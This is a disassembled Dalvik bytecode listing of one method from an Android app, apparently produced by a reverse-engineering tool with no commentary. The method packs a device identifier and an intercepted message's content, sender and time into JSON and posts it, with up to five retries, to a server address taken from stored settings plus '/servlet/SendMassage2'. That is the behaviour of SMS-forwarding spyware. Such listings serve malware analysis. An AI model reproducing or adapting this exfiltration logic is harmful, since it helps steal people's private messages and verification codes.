# Lkk/receiver/LJ$1;->run()V [access_flags=public]
#
# Parameters:
# local registers: v0...v10
#
# - return:void

run-BB@0x0 : [ run-BB@0xa ]
	0       (00000000) new-instance         v3, Lorg/json/JSONObject;
	1       (00000004) invoke-direct        v3, Lorg/json/JSONObject;-><init>()V

run-BB@0xa : [ run-BB@0x106 ]
	2       (0000000a) const-string         v5, 'mobile'
	3       (0000000e) iget-object          v6, v10, Lkk/receiver/LJ$1;->val$context Landroid/content/Context;
	4       (00000012) invoke-virtual       v6, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
	5       (00000018) move-result-object   v6
	6       (0000001a) invoke-static        v6, Lkk/util/StUtil;->getMachine(Landroid/content/Context;)Ljava/lang/String;
	7       (00000020) move-result-object   v6
	8       (00000022) invoke-virtual       v3, v5, v6, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	9       (00000028) const-string         v5, 'content'
	10      (0000002c) iget-object          v6, v10, Lkk/receiver/LJ$1;->this$0 Lkk/receiver/LJ;
	11      (00000030) iget-object          v6, v6, Lkk/receiver/LJ;->content Ljava/lang/String;
	12      (00000034) invoke-virtual       v3, v5, v6, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	13      (0000003a) const-string         v5, 'sender'
	14      (0000003e) iget-object          v6, v10, Lkk/receiver/LJ$1;->this$0 Lkk/receiver/LJ;
	15      (00000042) iget-object          v6, v6, Lkk/receiver/LJ;->sender Ljava/lang/String;
	16      (00000046) invoke-virtual       v3, v5, v6, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	17      (0000004c) const-string         v5, 'time'
	18      (00000050) iget-object          v6, v10, Lkk/receiver/LJ$1;->this$0 Lkk/receiver/LJ;
	19      (00000054) iget-object          v6, v6, Lkk/receiver/LJ;->df Ljava/text/SimpleDateFormat;
	20      (00000058) iget-object          v7, v10, Lkk/receiver/LJ$1;->this$0 Lkk/receiver/LJ;
	21      (0000005c) iget-wide            v8, v7, Lkk/receiver/LJ;->time J
	22      (00000060) invoke-static        v8, v9, Ljava/lang/Long;->valueOf(J)Ljava/lang/Long;
	23      (00000066) move-result-object   v7
	24      (00000068) invoke-virtual       v6, v7, Ljava/text/SimpleDateFormat;->format(Ljava/lang/Object;)Ljava/lang/String;
	25      (0000006e) move-result-object   v6
	26      (00000070) invoke-virtual       v3, v5, v6, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	27      (00000076) iget-object          v5, v10, Lkk/receiver/LJ$1;->val$context Landroid/content/Context;
	28      (0000007a) new-instance         v6, Ljava/lang/StringBuilder;
	29      (0000007e) invoke-direct        v6, Ljava/lang/StringBuilder;-><init>()V
	30      (00000084) iget-object          v7, v10, Lkk/receiver/LJ$1;->this$0 Lkk/receiver/LJ;
	31      (00000088) iget-object          v7, v7, Lkk/receiver/LJ;->sp Lkk/util/SPUtil;
	32      (0000008c) const-string         v8, 'URL'
	33      (00000090) const-string         v9, ''
	34      (00000094) invoke-virtual       v7, v8, v9, Lkk/util/SPUtil;->getValue(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
	35      (0000009a) move-result-object   v7
	36      (0000009c) invoke-virtual       v6, v7, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	37      (000000a2) move-result-object   v6
	38      (000000a4) const-string         v7, '/servlet/SendMassage2'
	39      (000000a8) invoke-virtual       v6, v7, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	40      (000000ae) move-result-object   v6
	41      (000000b0) invoke-virtual       v6, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	42      (000000b6) move-result-object   v6
	43      (000000b8) new-instance         v7, Ljava/lang/StringBuilder;
	44      (000000bc) invoke-direct        v7, Ljava/lang/StringBuilder;-><init>()V
	45      (000000c2) const-string         v8, '{"json":"'
	46      (000000c6) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	47      (000000cc) move-result-object   v7
	48      (000000ce) invoke-virtual       v3, Lorg/json/JSONObject;->toString()Ljava/lang/String;
	49      (000000d4) move-result-object   v8
	50      (000000d6) invoke-static        v8, Lkk/util/StUtil;->stringToJson(Ljava/lang/String;)Ljava/lang/String;
	51      (000000dc) move-result-object   v8
	52      (000000de) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	53      (000000e4) move-result-object   v7
	54      (000000e6) const-string         v8, '"}'
	55      (000000ea) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	56      (000000f0) move-result-object   v7
	57      (000000f2) invoke-virtual       v7, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	58      (000000f8) move-result-object   v7
	59      (000000fa) invoke-static        v5, v6, v7, Lkk/util/StUtil;->postJson(Landroid/content/Context; Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
	60      (00000100) move-result-object   v4
	61      (00000102) const/4              v0, 0
	62      (00000104) const/4              v2, 0
	a:1a9
	(Lorg/json/JSONException; -> 1b2 run-BB@0x1b2)

run-BB@0x106 : [ run-BB@0x10c run-BB@0x1ba ]
	63      (00000106) const/4              v5, 5
	64      (00000108) if-ge                v2, v5, +59
	a:1a9
	(Lorg/json/JSONException; -> 1b2 run-BB@0x1b2)

run-BB@0x10c : [ run-BB@0x110 run-BB@0x120 ]
	65      (0000010c) if-eqz               v4, +a
	a:1a9
	(Lorg/json/JSONException; -> 1b2 run-BB@0x1b2)

run-BB@0x110 : [ run-BB@0x120 run-BB@0x1ba ]
	66      (00000110) const-string         v5, '0'
	67      (00000114) invoke-virtual       v5, v4, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
	68      (0000011a) move-result          v5
	69      (0000011c) if-eqz               v5, +4f
	a:1a9
	(Lorg/json/JSONException; -> 1b2 run-BB@0x1b2)

run-BB@0x120 : [ run-BB@0x106 ]
	70      (00000120) iget-object          v5, v10, Lkk/receiver/LJ$1;->val$context Landroid/content/Context;
	71      (00000124) new-instance         v6, Ljava/lang/StringBuilder;
	72      (00000128) invoke-direct        v6, Ljava/lang/StringBuilder;-><init>()V
	73      (0000012e) iget-object          v7, v10, Lkk/receiver/LJ$1;->this$0 Lkk/receiver/LJ;
	74      (00000132) iget-object          v7, v7, Lkk/receiver/LJ;->sp Lkk/util/SPUtil;
	75      (00000136) const-string         v8, 'URL'
	76      (0000013a) const-string         v9, ''
	77      (0000013e) invoke-virtual       v7, v8, v9, Lkk/util/SPUtil;->getValue(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
	78      (00000144) move-result-object   v7
	79      (00000146) invoke-virtual       v6, v7, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	80      (0000014c) move-result-object   v6
	81      (0000014e) const-string         v7, '/servlet/SendMassage2'
	82      (00000152) invoke-virtual       v6, v7, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	83      (00000158) move-result-object   v6
	84      (0000015a) invoke-virtual       v6, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	85      (00000160) move-result-object   v6
	86      (00000162) new-instance         v7, Ljava/lang/StringBuilder;
	87      (00000166) invoke-direct        v7, Ljava/lang/StringBuilder;-><init>()V
	88      (0000016c) const-string         v8, '{"json":"'
	89      (00000170) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	90      (00000176) move-result-object   v7
	91      (00000178) invoke-virtual       v3, Lorg/json/JSONObject;->toString()Ljava/lang/String;
	92      (0000017e) move-result-object   v8
	93      (00000180) invoke-static        v8, Lkk/util/StUtil;->stringToJson(Ljava/lang/String;)Ljava/lang/String;
	94      (00000186) move-result-object   v8
	95      (00000188) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	96      (0000018e) move-result-object   v7
	97      (00000190) const-string         v8, '"}'
	98      (00000194) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	99      (0000019a) move-result-object   v7
	100     (0000019c) invoke-virtual       v7, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	101     (000001a2) move-result-object   v7
	102     (000001a4) invoke-static        v5, v6, v7, Lkk/util/StUtil;->postJson(Landroid/content/Context; Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
	103     (000001aa) move-result-object   v4
	104     (000001ac) add-int/lit8         v2, v2, 1
	105     (000001b0) goto                 -55

run-BB@0x1b2 : [ run-BB@0x1ba ]
	106     (000001b2) move-exception       v1
	107     (000001b4) invoke-virtual       v1, Lorg/json/JSONException;->printStackTrace()V

run-BB@0x1ba : 
	108     (000001ba) return-void          

